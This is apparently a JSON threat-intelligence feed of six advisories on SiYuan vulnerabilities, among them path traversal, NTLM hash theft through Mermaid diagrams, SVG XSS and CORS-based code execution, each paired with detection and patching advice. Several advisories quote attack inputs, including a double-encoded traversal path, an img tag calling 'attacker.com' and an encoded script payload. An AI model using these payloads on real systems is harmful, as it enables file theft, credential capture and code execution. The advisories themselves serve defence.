{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/siyuan/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[{"cvss":9.3,"id":"CVE-2026-30869"}],"_cs_exploited":false,"_cs_products":["siyuan"],"_cs_severities":["high"],"_cs_tags":["path-traversal","web-application","siYuan"],"_cs_type":"advisory","_cs_vendors":["siyuan"],"content_html":"\u003cp\u003eSiYuan is vulnerable to a path traversal vulnerability (CVE-2026-30869) due to a redundant \u003ccode\u003eurl.PathUnescape()\u003c/code\u003e call within the \u003ccode\u003eserveExport()\u003c/code\u003e function. The vulnerability exists in versions prior to 3.6.5. This flaw allows an authenticated attacker, including low-privilege users with Publish/Reader roles, to bypass intended security restrictions and access sensitive files stored within the SiYuan workspace. The initial fix attempted with \u003ccode\u003eIsSensitivePath()\u003c/code\u003e proved insufficient as it did not address the core issue of double URL decoding. An attacker can exploit this vulnerability by using double URL encoded characters in a crafted HTTP request, allowing them to read arbitrary files such as the complete SQLite document database (\u003ccode\u003esiyuan.db\u003c/code\u003e), kernel logs, and other critical files.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn authenticated attacker sends a GET request to the \u003ccode\u003e/export/\u003c/code\u003e endpoint with a double URL encoded path, such as \u003ccode\u003e/export/%252e%252e/siyuan.db\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe Go HTTP server decodes the initial layer of URL encoding, transforming \u003ccode\u003e%25\u003c/code\u003e into \u003ccode\u003e%\u003c/code\u003e, resulting in a path like \u003ccode\u003e/export/%2e%2e/siyuan.db\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe path cleaner does not recognize \u003ccode\u003e%2e%2e\u003c/code\u003e as directory traversal, so it passes through.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eserveExport()\u003c/code\u003e function then calls \u003ccode\u003eurl.PathUnescape()\u003c/code\u003e on the path, decoding \u003ccode\u003e%2e%2e\u003c/code\u003e into \u003ccode\u003e..\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003efilepath.Join()\u003c/code\u003e function concatenates the \u003ccode\u003eexportBaseDir\u003c/code\u003e with the now decoded path, e.g., \u003ccode\u003e\u0026lt;workspace\u0026gt;/../siyuan.db\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eIsSensitivePath()\u003c/code\u003e check fails to block the request because it doesn\u0026rsquo;t account for the decoded path or specific database files in the \u003ccode\u003etemp/\u003c/code\u003e directory.\u003c/li\u003e\n\u003cli\u003eThe attacker successfully retrieves the contents of the \u003ccode\u003esiyuan.db\u003c/code\u003e file, which contains the complete document database.\u003c/li\u003e\n\u003cli\u003eThe attacker repeats the process to access other sensitive files within the workspace, such as \u003ccode\u003esiyuan.log\u003c/code\u003e, \u003ccode\u003eblocktree.db\u003c/code\u003e, and \u003ccode\u003easset_content.db\u003c/code\u003e.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows an attacker to exfiltrate sensitive data, including the entire SQLite document database, potentially containing all user documents, attributes, and search indexes. The attacker can also access the kernel log, which may contain internal server paths, versions, configuration details, and error messages. This information disclosure could lead to further compromise of the system. While the number of victims is unknown, any SiYuan instance running a version prior to 3.6.5 is potentially vulnerable.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade SiYuan to version 3.6.5 or later to remediate the vulnerability.\u003c/li\u003e\n\u003cli\u003eDeploy the provided Sigma rule \u003ccode\u003eDetect SiYuan Path Traversal Attempt\u003c/code\u003e to detect attempts to exploit this vulnerability by monitoring for double URL encoded characters in requests to the \u003ccode\u003e/export/\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for requests to the \u003ccode\u003e/export/\u003c/code\u003e endpoint containing \u003ccode\u003e%252e%252e\u003c/code\u003e to identify potential exploitation attempts.\u003c/li\u003e\n\u003cli\u003eConsider implementing a more robust path validation mechanism within the \u003ccode\u003eserveExport()\u003c/code\u003e function that properly handles URL decoding and directory traversal attempts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-22T20:55:31Z","date_published":"2026-04-22T20:55:31Z","id":"/briefs/2026-04-siyuan-path-traversal/","summary":"SiYuan is vulnerable to path traversal via double URL encoding in the `/export/` endpoint, bypassing an incomplete fix for CVE-2026-30869; an authenticated attacker can exploit this vulnerability to traverse directories and read arbitrary workspace files, including the SQLite database (`siyuan.db`), kernel log, and user documents due to a redundant `url.PathUnescape()` call in `serveExport()`.","title":"SiYuan Path Traversal via Double URL Encoding in `/export/` Endpoint","url":"https://feed.craftedsignal.io/briefs/2026-04-siyuan-path-traversal/"},{"_cs_actors":[],"_cs_cves":[{"id":"CVE-2026-40107"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["siyuan","ntlm","ssrf","credential-theft","mermaid"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eSiYuan, a note-taking application, is vulnerable to a zero-click NTLM hash theft and blind SSRF exploit due to insecure configuration of Mermaid.js. The application configures Mermaid.js with \u003ccode\u003esecurityLevel: \u0026quot;loose\u0026quot;\u003c/code\u003e and \u003ccode\u003ehtmlLabels: true\u003c/code\u003e, which allows \u003ccode\u003e\u0026lt;img\u0026gt;\u003c/code\u003e tags with \u003ccode\u003esrc\u003c/code\u003e attributes to bypass sanitization and be injected into SVG \u003ccode\u003e\u0026lt;foreignObject\u0026gt;\u003c/code\u003e blocks. When a user opens a note containing a malicious Mermaid diagram with a protocol-relative URL (e.g., \u003ccode\u003e//attacker.com/image.png\u003c/code\u003e), the Electron client fetches the URL. On Windows, this resolves as a UNC path, triggering SMB authentication and sending the victim\u0026rsquo;s NTLMv2 hash to the attacker. On macOS and Linux, the same diagram triggers an HTTP request to the attacker\u0026rsquo;s server, exfiltrating the victim\u0026rsquo;s IP address. The vulnerability affects SiYuan versions prior to the fix implemented after April 7, 2026. This allows for credential theft without any user interaction beyond opening a note.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker crafts a malicious SiYuan note containing a Mermaid diagram with a protocol-relative URL within an \u003ccode\u003e\u0026lt;img\u0026gt;\u003c/code\u003e tag, such as \u003ccode\u003e\u0026lt;img src='//attacker.com/share/img.png'\u0026gt;\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker distributes the malicious note (e.g., via sharing or a crafted .sy export).\u003c/li\u003e\n\u003cli\u003eThe victim opens the note in SiYuan.\u003c/li\u003e\n\u003cli\u003eSiYuan renders the Mermaid diagram using the insecure Mermaid.js configuration.\u003c/li\u003e\n\u003cli\u003eThe SVG containing the malicious \u003ccode\u003e\u0026lt;img\u0026gt;\u003c/code\u003e tag is injected into the DOM via \u003ccode\u003einnerHTML\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe Electron client attempts to fetch the resource at the protocol-relative URL.\u003c/li\u003e\n\u003cli\u003eOn Windows, the protocol-relative URL resolves to a UNC path (\u003ccode\u003e\\\\attacker.com\\share\\img.png\u003c/code\u003e), initiating an SMB connection.\u003c/li\u003e\n\u003cli\u003eWindows automatically sends the victim\u0026rsquo;s NTLMv2 hash to the attacker\u0026rsquo;s SMB server, or makes an HTTP request leaking victim\u0026rsquo;s IP on other platforms.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe vulnerability allows for zero-click NTLMv2 hash theft on Windows systems, where the victim only needs to open a note containing the malicious Mermaid diagram. The stolen NTLMv2 hashes can be cracked offline or used in relay attacks to gain unauthorized access to the victim\u0026rsquo;s resources. On all platforms, this vulnerability can be exploited to perform blind SSRF and leak the victim\u0026rsquo;s IP address, acting as a tracking pixel to confirm when the note was opened. This affects all SiYuan users who receive a crafted note.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect SiYuan Mermaid NTLM Theft Attempt\u003c/code\u003e to identify SMB traffic originating from SiYuan processes attempting to connect to external IPs (network_connection log source).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect SiYuan Mermaid SSRF Attempt\u003c/code\u003e to detect HTTP requests from SiYuan to external IP addresses with a suspicious URL (network_connection log source).\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for SMB connections originating from SiYuan, especially to unusual or external destinations (network_connection log source).\u003c/li\u003e\n\u003cli\u003eBlock the attacker\u0026rsquo;s domain (\u003ccode\u003eattacker.com\u003c/code\u003e) at the DNS resolver, as observed in the malicious Mermaid diagram example (iocs).\u003c/li\u003e\n\u003cli\u003eUpgrade SiYuan to a patched version that addresses CVE-2026-40107 to mitigate the underlying vulnerability.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-11T12:00:00Z","date_published":"2026-04-11T12:00:00Z","id":"/briefs/2026-04-siyuan-ntlm-ssrf/","summary":"SiYuan is vulnerable to zero-click NTLM hash theft on Windows and blind SSRF on all platforms due to insecure Mermaid.js configuration, where a malicious Mermaid diagram containing a protocol-relative URL can be injected into a note, causing the Electron client to fetch the URL, triggering SMB authentication on Windows and sending the victim's NTLMv2 hash to the attacker. On macOS and Linux, the request acts as a tracking pixel and blind SSRF.","title":"SiYuan Zero-Click NTLM Theft and Blind SSRF via Mermaid Diagrams","url":"https://feed.craftedsignal.io/briefs/2026-04-siyuan-ntlm-ssrf/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["xss","siyuan","svg","reflected-xss"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eSiYuan Note, a note-taking application, is susceptible to a reflected XSS vulnerability in its dynamic icon generation functionality. This flaw, present in versions prior to commit f09953afc57a, arises from an insufficient sanitization of SVG content, specifically failing to account for namespace prefixes in SVG elements. The vulnerability resides in the \u003ccode\u003e/api/icon/getDynamicIcon\u003c/code\u003e endpoint, which is accessible without authentication.  An attacker can exploit this by crafting a malicious SVG payload containing namespaced \u003ccode\u003e\u0026lt;script\u0026gt;\u003c/code\u003e tags (e.g., \u003ccode\u003e\u0026lt;x:script xmlns:x=\u0026quot;http://www.w3.org/2000/svg\u0026quot;\u0026gt;\u003c/code\u003e), which bypasses the application\u0026rsquo;s XSS mitigation measures. Successful exploitation allows arbitrary JavaScript execution within the context of the victim\u0026rsquo;s SiYuan Note instance, potentially leading to data theft or other malicious activities.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker crafts a malicious URL targeting the \u003ccode\u003e/api/icon/getDynamicIcon\u003c/code\u003e endpoint with the \u003ccode\u003etype=8\u003c/code\u003e parameter.\u003c/li\u003e\n\u003cli\u003eThe crafted URL includes a \u003ccode\u003econtent\u003c/code\u003e parameter containing a specially crafted SVG payload. This SVG payload leverages a namespace prefix to bypass the \u003ccode\u003eSanitizeSVG\u003c/code\u003e function\u0026rsquo;s intended filtering, e.g., \u003ccode\u003e%3C%2Fx%3Ascript%20xmlns%3Ax%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3Ealert%28document.domain%29%3C%2Fx%3Ascript%3E\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe victim, either unknowingly or through social engineering, opens the malicious URL in their browser.\u003c/li\u003e\n\u003cli\u003eThe SiYuan server processes the request without proper sanitization, inserting the attacker-controlled content into the SVG, and serves the response with \u003ccode\u003eContent-Type: image/svg+xml\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe browser\u0026rsquo;s XML parser interprets the namespace prefix, resolving it to the SVG namespace, and executes the embedded JavaScript code.\u003c/li\u003e\n\u003cli\u003eThe JavaScript code executes within the security context of the SiYuan application (\u003ccode\u003ehttp://\u0026lt;siyuan-host\u0026gt;:6806\u003c/code\u003e), due to \u003ccode\u003eAccess-Control-Allow-Origin: *\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s script can now interact with the SiYuan API using the victim\u0026rsquo;s session cookies.\u003c/li\u003e\n\u003cli\u003eThe attacker can perform actions such as reading notes, exporting data, or modifying settings without authentication.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis vulnerability poses a significant risk to SiYuan Note users, particularly those whose instances are reachable on a local network. An attacker could potentially compromise sensitive information, manipulate user data, or gain unauthorized access to the application. The ease of exploitation and the absence of authentication requirements make this vulnerability particularly dangerous. Because SiYuan sets \u003ccode\u003eAccess-Control-Allow-Origin: *\u003c/code\u003e and the script runs same-origin, it can call any API endpoint using the victim\u0026rsquo;s existing session cookies, including endpoints to read all notes, export data, or modify settings.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade SiYuan Note to a version that includes the fix for commit f09953afc57a to remediate the vulnerability.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect SiYuan SVG XSS Attempt\u0026rdquo; to identify potential exploitation attempts in web server logs.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for requests to \u003ccode\u003e/api/icon/getDynamicIcon\u003c/code\u003e containing SVG payloads with namespace-prefixed script tags, as demonstrated in the PoC.\u003c/li\u003e\n\u003cli\u003eConsider implementing a Content Security Policy (CSP) on the SiYuan server to restrict the execution of inline JavaScript.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-01T00:30:01Z","date_published":"2026-04-01T00:30:01Z","id":"/briefs/2026-04-siyuan-xss/","summary":"SiYuan Note versions prior to the fix for commit f09953afc57a are vulnerable to reflected cross-site scripting (XSS) via a namespace prefix bypass in the SanitizeSVG function when handling dynamic icons, allowing unauthenticated attackers to execute arbitrary JavaScript in a victim's browser.","title":"SiYuan Note Reflected XSS Vulnerability in SVG Processing","url":"https://feed.craftedsignal.io/briefs/2026-04-siyuan-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":9.6,"id":"CVE-2026-34449"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-34449","rce","siyuan","cors"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eSiYuan is a personal knowledge management system. Versions prior to 3.6.2 contain a critical vulnerability (CVE-2026-34449) that allows a malicious website to execute arbitrary code on any desktop running the application. This is achieved by exploiting an overly permissive Cross-Origin Resource Sharing (CORS) policy (\u0026ldquo;Access-Control-Allow-Origin: *\u0026rdquo; combined with \u0026ldquo;Access-Control-Allow-Private-Network: true\u0026rdquo;). An attacker can inject a JavaScript snippet into the application via its API. This injected code then executes in the context of Electron\u0026rsquo;s Node.js environment, granting the attacker full operating system access. The vulnerability is triggered simply by a user visiting a malicious website while SiYuan is running. The issue has been addressed and patched in version 3.6.2 of SiYuan. This RCE can allow attackers to steal data, install malware, or perform other malicious activities on the victim\u0026rsquo;s machine.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eVictim launches the SiYuan application on their desktop (Windows, Linux, or macOS).\u003c/li\u003e\n\u003cli\u003eVictim visits a malicious website in a web browser while SiYuan is running.\u003c/li\u003e\n\u003cli\u003eThe malicious website leverages the permissive CORS policy of SiYuan.\u003c/li\u003e\n\u003cli\u003eThe malicious website sends an API request to the running SiYuan instance.\u003c/li\u003e\n\u003cli\u003eThis API request injects a malicious JavaScript payload into SiYuan.\u003c/li\u003e\n\u003cli\u003eThe injected JavaScript code is stored within SiYuan\u0026rsquo;s data.\u003c/li\u003e\n\u003cli\u003eThe next time the user opens SiYuan\u0026rsquo;s UI, the injected JavaScript code executes within Electron\u0026rsquo;s Node.js context.\u003c/li\u003e\n\u003cli\u003eThe attacker gains full OS access and can perform arbitrary actions.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-34449 allows for complete compromise of the user\u0026rsquo;s system. The attacker can steal sensitive data, install persistent backdoors, or deploy ransomware. Given SiYuan\u0026rsquo;s purpose as a knowledge management system, it likely holds valuable and sensitive personal or business information. The impact is significant due to the ease of exploitation requiring no user interaction beyond visiting a malicious website.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImmediately upgrade SiYuan to version 3.6.2 or later to patch CVE-2026-34449.\u003c/li\u003e\n\u003cli\u003eMonitor network connections for unusual API requests originating from web browsers, as this could indicate exploitation attempts. Deploy the Sigma rule \u003ccode\u003etitle: \u0026quot;Detect Suspicious SiYuan API Access from Web Browser\u0026quot;\u003c/code\u003e to detect this behavior.\u003c/li\u003e\n\u003cli\u003eImplement strict CORS policies for web applications to prevent unauthorized cross-origin requests.\u003c/li\u003e\n\u003cli\u003eEnable process creation logging and monitor for unexpected processes spawned from SiYuan, as this could be a sign of successful RCE. Deploy the Sigma rule \u003ccode\u003etitle: \u0026quot;Detect Processes Spawned from SiYuan Indicating RCE\u0026quot;\u003c/code\u003e to detect this.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-31T22:17:16Z","date_published":"2026-03-31T22:17:16Z","id":"/briefs/2026-04-siyuan-rce/","summary":"SiYuan versions prior to 3.6.2 are vulnerable to remote code execution (RCE) via a malicious website exploiting a permissive CORS policy to inject a JavaScript snippet, leading to arbitrary code execution within the application's Node.js context.","title":"SiYuan Knowledge Management System RCE via Malicious Website","url":"https://feed.craftedsignal.io/briefs/2026-04-siyuan-rce/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["directory-traversal","siyuan","cve-2026-33670"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThe SiYuan note-taking application is susceptible to a critical directory traversal vulnerability affecting versions up to 0.0.0-20260317012524-fe4523fff2c8. The vulnerability resides in the \u003ccode\u003e/api/file/readDir\u003c/code\u003e endpoint, which lacks authentication. This allows unauthenticated attackers to send POST requests to enumerate directories and retrieve file names within the application\u0026rsquo;s data and configuration directories. Successful exploitation allows a malicious actor to gain sensitive information about the application\u0026rsquo;s file structure, and could be chained with a file-reading vulnerability to achieve arbitrary document access. This poses a significant risk to confidentiality and data security.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker identifies a vulnerable SiYuan instance.\u003c/li\u003e\n\u003cli\u003eThe attacker sends an unauthenticated POST request to the \u003ccode\u003e/api/file/readDir\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe POST request includes a \u003ccode\u003epath\u003c/code\u003e parameter specifying the directory to list, such as \u003ccode\u003edata\u003c/code\u003e or \u003ccode\u003econf\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe SiYuan application processes the request without authentication and returns a JSON response containing a list of files and directories within the specified path.\u003c/li\u003e\n\u003cli\u003eThe attacker parses the JSON response to identify interesting files and directories.\u003c/li\u003e\n\u003cli\u003eThe attacker repeats steps 2-5 to traverse deeper into the directory structure.\u003c/li\u003e\n\u003cli\u003eThe attacker identifies the location of sensitive documents or configuration files.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages a separate file reading vulnerability (not detailed in this brief) to access and exfiltrate the identified documents or configuration files, gaining unauthorized access to sensitive information.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this directory traversal vulnerability allows an attacker to enumerate the entire directory structure of a SiYuan notebook. This may expose sensitive information stored within the application\u0026rsquo;s data and configuration files. When combined with a file reading vulnerability, attackers can access and exfiltrate arbitrary documents, potentially leading to data breaches and confidentiality compromise. The number of affected users is potentially large, given the popularity of the SiYuan note-taking application. Targeted sectors would include any organization or individual using SiYuan for storing sensitive information.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply updates to SiYuan to versions greater than 0.0.0-20260317012524-fe4523fff2c8 that patch CVE-2026-33670.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for POST requests to the \u003ccode\u003e/api/file/readDir\u003c/code\u003e endpoint, as detailed in the rule below, and investigate unexpected activity.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule provided to detect exploitation attempts in web server logs, tuning it for your environment.\u003c/li\u003e\n\u003cli\u003eBlock access from IP address \u003ccode\u003e172.18.40.184\u003c/code\u003e observed in the exploit PoC, if seen connecting to your SiYuan instances.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-26T12:00:00Z","date_published":"2026-03-26T12:00:00Z","id":"/briefs/2026-03-siyuan-traversal/","summary":"SiYuan note taking application is vulnerable to a directory traversal via the /api/file/readDir endpoint, which does not require authentication, allowing an attacker to enumerate the directory structure and retrieve file names, potentially leading to arbitrary document reading.","title":"SiYuan Note Taking Application Directory Traversal Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-03-siyuan-traversal/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["siyuan","arbitrary-document-access","vulnerability","webserver"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eSiYuan, a note-taking application, is susceptible to an arbitrary document reading vulnerability within its publishing service. This flaw allows an unauthenticated attacker to bypass access controls and retrieve the content of any document, regardless of encryption or access restrictions. The vulnerability stems from inadequate authorization checks when accessing document content through specific API endpoints. The issue was reported on March 25, 2026, and is tracked as CVE-2026-33669. The vulnerable package is \u003ccode\u003ego/github.com/siyuan-note/siyuan/kernel\u003c/code\u003e, specifically versions equal to or older than \u003ccode\u003e0.0.0-20260317012524-fe4523fff2c8\u003c/code\u003e. This vulnerability poses a significant risk to organizations and individuals using SiYuan for sensitive data storage, potentially leading to unauthorized access and data breaches.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a SiYuan instance with the publishing service enabled.\u003c/li\u003e\n\u003cli\u003eThe attacker sends a request to the \u003ccode\u003e/api/file/readDir\u003c/code\u003e endpoint to retrieve a list of document IDs. This endpoint lacks proper authorization checks.\u003c/li\u003e\n\u003cli\u003eThe SiYuan server responds with a list of document IDs available within the publishing service.\u003c/li\u003e\n\u003cli\u003eThe attacker selects a target document ID from the list obtained in the previous step.\u003c/li\u003e\n\u003cli\u003eThe attacker sends a POST request to the \u003ccode\u003e/api/block/getChildBlocks\u003c/code\u003e endpoint, providing the target document ID in the request body. This endpoint is intended to retrieve child blocks of a specific document.\u003c/li\u003e\n\u003cli\u003eDue to insufficient access control, the server processes the request and returns the content of the requested document, even if it is encrypted or restricted.\u003c/li\u003e\n\u003cli\u003eThe attacker parses the JSON response to extract the document content, which is typically formatted in Markdown.\u003c/li\u003e\n\u003cli\u003eThe attacker can repeat steps 4-7 to obtain the content of other documents.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe arbitrary document reading vulnerability allows unauthorized access to potentially sensitive information stored within SiYuan. Successful exploitation could lead to the disclosure of confidential documents, intellectual property, personal data, or other restricted content. The impact is significant, as it bypasses intended security measures such as encryption and access controls. While specific victim numbers are unknown, any organization or individual utilizing the affected SiYuan version with the publishing service enabled is potentially at risk. The CVE is rated critical.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade SiYuan to a patched version that addresses CVE-2026-33669.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;SiYuan Arbitrary Document Access via getChildBlocks\u0026rdquo; to detect potential exploitation attempts targeting the \u003ccode\u003e/api/block/getChildBlocks\u003c/code\u003e endpoint in your web server logs.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for suspicious activity, specifically POST requests to \u003ccode\u003e/api/block/getChildBlocks\u003c/code\u003e with unusual document IDs or request patterns.\u003c/li\u003e\n\u003cli\u003eImplement rate limiting on the \u003ccode\u003e/api/file/readDir\u003c/code\u003e and \u003ccode\u003e/api/block/getChildBlocks\u003c/code\u003e endpoints to mitigate potential abuse.\u003c/li\u003e\n\u003cli\u003eEnable webserver logging and ensure all SiYuan instances are monitored by the logging solution.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-25T19:37:18Z","date_published":"2026-03-25T19:37:18Z","id":"/briefs/2026-06-siyuan-arbitrary-doc-read/","summary":"SiYuan is vulnerable to arbitrary document reading via the publishing service, allowing attackers to retrieve document IDs and view the content of all documents, including encrypted or prohibited ones, by exploiting the `/api/file/readDir` and `/api/block/getChildBlocks` interfaces.","title":"SiYuan Arbitrary Document Reading Vulnerability in Publishing Service","url":"https://feed.craftedsignal.io/briefs/2026-06-siyuan-arbitrary-doc-read/"}],"language":"en","title":"CraftedSignal Threat Feed — Siyuan","version":"https://jsonfeed.org/version/1.1"}